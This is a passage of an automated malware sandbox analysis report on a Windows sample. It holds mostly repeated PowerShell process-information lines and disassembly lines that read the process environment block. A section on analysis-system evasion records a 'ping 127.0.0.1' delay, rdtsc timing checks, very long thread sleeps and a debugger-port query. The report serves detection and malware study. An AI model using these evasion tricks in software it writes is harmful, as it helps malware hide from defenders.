            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347D1C0 rdtsc 11_2_0347D1C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3397Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1685Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1479Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4298Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5501Jump to behavior
            Source: C:\Windows\SysWOW64\appidtel.exeAPI coverage: 0.7 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep count: 3397 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep count: 1685 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep count: 4298 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep count: 5501 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep time: -16602069666338586s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\appidtel.exe TID: 6016Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: powershell.exe, 00000008.00000002.1748145511.0000021AFE9E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\appidtel.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347D1C0 rdtsc 11_2_0347D1C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_004179B3 LdrLoadDll,11_2_004179B3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03482349 mov eax, dword ptr fs:[00000030h]11_2_03482349
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D5341 mov eax, dword ptr fs:[00000030h]11_2_034D5341
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F7330 mov eax, dword ptr fs:[00000030h]11_2_033F7330
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348035C mov eax, dword ptr fs:[00000030h]11_2_0348035C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348035C mov eax, dword ptr fs:[00000030h]11_2_0348035C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348035C mov eax, dword ptr fs:[00000030h]11_2_0348035C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348035C mov ecx, dword ptr fs:[00000030h]11_2_0348035C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348035C mov eax, dword ptr fs:[00000030h]11_2_0348035C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348035C mov eax, dword ptr fs:[00000030h]11_2_0348035C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CA352 mov eax, dword ptr fs:[00000030h]11_2_034CA352
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BF367 mov eax, dword ptr fs:[00000030h]11_2_034BF367
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FC310 mov ecx, dword ptr fs:[00000030h]11_2_033FC310
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03407370 mov eax, dword ptr fs:[00000030h]11_2_03407370
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03407370 mov eax, dword ptr fs:[00000030h]11_2_03407370
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03407370 mov eax, dword ptr fs:[00000030h]11_2_03407370
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034A437C mov eax, dword ptr fs:[00000030h]11_2_034A437C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348930B mov eax, dword ptr fs:[00000030h]11_2_0348930B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348930B mov eax, dword ptr fs:[00000030h]11_2_0348930B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348930B mov eax, dword ptr fs:[00000030h]11_2_0348930B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343A30B mov eax, dword ptr fs:[00000030h]11_2_0343A30B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343A30B mov eax, dword ptr fs:[00000030h]11_2_0343A30B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343A30B mov eax, dword ptr fs:[00000030h]11_2_0343A30B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03420310 mov ecx, dword ptr fs:[00000030h]11_2_03420310
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C132D mov eax, dword ptr fs:[00000030h]11_2_034C132D
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C132D mov eax, dword ptr fs:[00000030h]11_2_034C132D
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342F32A mov eax, dword ptr fs:[00000030h]11_2_0342F32A
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F9353 mov eax, dword ptr fs:[00000030h]11_2_033F9353
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F9353 mov eax, dword ptr fs:[00000030h]11_2_033F9353
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FD34C mov eax, dword ptr fs:[00000030h]11_2_033FD34C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FD34C mov eax, dword ptr fs:[00000030h]11_2_033FD34C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340A3C0 mov eax, dword ptr fs:[00000030h]11_2_0340A3C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340A3C0 mov eax, dword ptr fs:[00000030h]11_2_0340A3C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340A3C0 mov eax, dword ptr fs:[00000030h]11_2_0340A3C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340A3C0 mov eax, dword ptr fs:[00000030h]11_2_0340A3C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340A3C0 mov eax, dword ptr fs:[00000030h]11_2_0340A3C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340A3C0 mov eax, dword ptr fs:[00000030h]11_2_0340A3C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034083C0 mov eax, dword ptr fs:[00000030h]11_2_034083C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034083C0 mov eax, dword ptr fs:[00000030h]11_2_034083C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034083C0 mov eax, dword ptr fs:[00000030h]11_2_034083C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034083C0 mov eax, dword ptr fs:[00000030h]11_2_034083C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BC3CD mov eax, dword ptr fs:[00000030h]11_2_034BC3CD
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BB3D0 mov ecx, dword ptr fs:[00000030h]11_2_034BB3D0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F8397 mov eax, dword ptr fs:[00000030h]11_2_033F8397
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F8397 mov eax, dword ptr fs:[00000030h]11_2_033F8397
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F8397 mov eax, dword ptr fs:[00000030h]11_2_033F8397
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034103E9 mov eax, dword ptr fs:[00000030h]11_2_034103E9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034103E9 mov eax, dword ptr fs:[00000030h]11_2_034103E9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034103E9 mov eax, dword ptr fs:[00000030h]11_2_034103E9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034103E9 mov eax, dword ptr fs:[00000030h]11_2_034103E9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034103E9 mov eax, dword ptr fs:[00000030h]11_2_034103E9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034103E9 mov eax, dword ptr fs:[00000030h]11_2_034103E9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034103E9 mov eax, dword ptr fs:[00000030h]11_2_034103E9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034103E9 mov eax, dword ptr fs:[00000030h]11_2_034103E9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BF3E6 mov eax, dword ptr fs:[00000030h]11_2_034BF3E6
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D53FC mov eax, dword ptr fs:[00000030h]11_2_034D53FC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341E3F0 mov eax, dword ptr fs:[00000030h]11_2_0341E3F0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341E3F0 mov eax, dword ptr fs:[00000030h]11_2_0341E3F0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341E3F0 mov eax, dword ptr fs:[00000030h]11_2_0341E3F0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FE388 mov eax, dword ptr fs:[00000030h]11_2_033FE388
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FE388 mov eax, dword ptr fs:[00000030h]11_2_033FE388
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FE388 mov eax, dword ptr fs:[00000030h]11_2_033FE388
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034363FF mov eax, dword ptr fs:[00000030h]11_2_034363FF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342438F mov eax, dword ptr fs:[00000030h]11_2_0342438F
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342438F mov eax, dword ptr fs:[00000030h]11_2_0342438F
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D539D mov eax, dword ptr fs:[00000030h]11_2_034D539D
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0345739A mov eax, dword ptr fs:[00000030h]11_2_0345739A
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0345739A mov eax, dword ptr fs:[00000030h]11_2_0345739A
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034333A0 mov eax, dword ptr fs:[00000030h]11_2_034333A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034333A0 mov eax, dword ptr fs:[00000030h]11_2_034333A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034233A5 mov eax, dword ptr fs:[00000030h]11_2_034233A5
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F823B mov eax, dword ptr fs:[00000030h]11_2_033F823B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343724D mov eax, dword ptr fs:[00000030h]11_2_0343724D
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03406259 mov eax, dword ptr fs:[00000030h]11_2_03406259
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BB256 mov eax, dword ptr fs:[00000030h]11_2_034BB256
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BB256 mov eax, dword ptr fs:[00000030h]11_2_034BB256
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03404260 mov eax, dword ptr fs:[00000030h]11_2_03404260
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03404260 mov eax, dword ptr fs:[00000030h]11_2_03404260
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03404260 mov eax, dword ptr fs:[00000030h]11_2_03404260
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CD26B mov eax, dword ptr fs:[00000030h]11_2_034CD26B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CD26B mov eax, dword ptr fs:[00000030h]11_2_034CD26B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03441270 mov eax, dword ptr fs:[00000030h]11_2_03441270
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03441270 mov eax, dword ptr fs:[00000030h]11_2_03441270
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03429274 mov eax, dword ptr fs:[00000030h]11_2_03429274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0274 mov eax, dword ptr fs:[00000030h]11_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03437208 mov eax, dword ptr fs:[00000030h]11_2_03437208
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03437208 mov eax, dword ptr fs:[00000030h]11_2_03437208
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F826B mov eax, dword ptr fs:[00000030h]11_2_033F826B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D5227 mov eax, dword ptr fs:[00000030h]11_2_034D5227
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FA250 mov eax, dword ptr fs:[00000030h]11_2_033FA250
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F9240 mov eax, dword ptr fs:[00000030h]11_2_033F9240
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F9240 mov eax, dword ptr fs:[00000030h]11_2_033F9240
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342B2C0 mov eax, dword ptr fs:[00000030h]11_2_0342B2C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342B2C0 mov eax, dword ptr fs:[00000030h]11_2_0342B2C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342B2C0 mov eax, dword ptr fs:[00000030h]11_2_0342B2C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342B2C0 mov eax, dword ptr fs:[00000030h]11_2_0342B2C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342B2C0 mov eax, dword ptr fs:[00000030h]11_2_0342B2C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342B2C0 mov eax, dword ptr fs:[00000030h]11_2_0342B2C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342B2C0 mov eax, dword ptr fs:[00000030h]11_2_0342B2C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340A2C3 mov eax, dword ptr fs:[00000030h]11_2_0340A2C3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340A2C3 mov eax, dword ptr fs:[00000030h]11_2_0340A2C3
